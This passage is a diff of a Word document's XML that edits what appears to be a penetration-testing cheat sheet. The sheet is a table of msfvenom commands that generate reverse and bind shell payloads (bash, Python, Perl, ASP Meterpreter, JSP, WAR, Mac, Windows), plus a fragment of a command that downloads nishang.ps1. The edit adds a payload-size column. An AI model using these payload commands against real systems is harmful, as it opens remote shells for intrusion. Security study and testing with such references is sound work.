+              <w:t>osx</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>/x86/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>shell_bind_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> RHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f macho &gt; </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>shell.macho</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Mac Bind shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>74</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1473,7 +1844,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1544,36 +1915,56 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t>reverse_bash</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f raw &gt; shell.sh</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>BASH Shell</w:t>
+              <w:t>reverse_python</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f raw &gt; shell.py</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>Python Shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>545</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1581,7 +1972,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1652,36 +2043,56 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t>reverse_perl</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f raw &gt; shell.pl</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>PERL Shell</w:t>
+              <w:t>reverse_bash</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f raw &gt; shell.sh</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>BASH Shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>69</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1689,7 +2100,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1715,16 +2126,16 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve"> -p windows/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>meterpreter</w:t>
+              <w:t xml:space="preserve"> -p </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>cmd</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
@@ -1742,50 +2153,74 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t>reverse_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f asp &gt; shell.asp</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve">ASP </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Meterpreter </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>shell</w:t>
+              <w:t>unix</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>reverse_perl</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f raw &gt; shell.pl</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>PERL Shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>234</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1793,7 +2228,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1819,55 +2254,97 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve"> -p java/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>jsp_shell_reverse_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f raw &gt; </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>shell.jsp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>JSP Shell</w:t>
+              <w:t xml:space="preserve"> -p windows/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f asp &gt; shell.asp</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve">ASP </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Meterpreter </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>341</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1875,7 +2352,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1919,37 +2396,57 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f war &gt; </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>shell.war</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>WAR Shell</w:t>
+              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f raw &gt; </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>shell.jsp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>JSP Shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>1501</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1957,7 +2454,109 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -p java/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>jsp_shell_reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f war &gt; </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>shell.war</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>WAR Shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>1080</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2172,7 +2771,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
+            <w:tcW w:w="3060" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2210,6 +2809,26 @@
                 <w:szCs w:val="16"/>
               </w:rPr>
               <w:t>Shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>30306</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2217,7 +2836,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2327,7 +2946,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
+            <w:tcW w:w="3060" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2351,6 +2970,26 @@
                 <w:szCs w:val="16"/>
               </w:rPr>
               <w:t xml:space="preserve"> Reverse Shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>3036</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2361,7 +3000,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+            <w:tcW w:w="10800" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2486,10 +3125,19 @@
               <w:t>/nishang.ps1')\"" -f python</w:t>
             </w:r>
           </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3330" w:type="dxa"/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3060" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2535,30 +3183,185 @@
                 <w:sz w:val="16"/>
                 <w:szCs w:val="16"/>
               </w:rPr>
-              <w:t xml:space="preserve"> in python</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-              </w:rPr>
-              <w:t>1342 bytes</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>for P</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>ython</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> exploit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1224" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>269</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="11520" w:type="dxa"/>
+        <w:trPr>
+          <w:trHeight w:val="71"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10800" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -p w</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>indows/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t>shell_reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -f </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="16"/>
+                <w:szCs w:val="16"/>
+              </w:rPr>
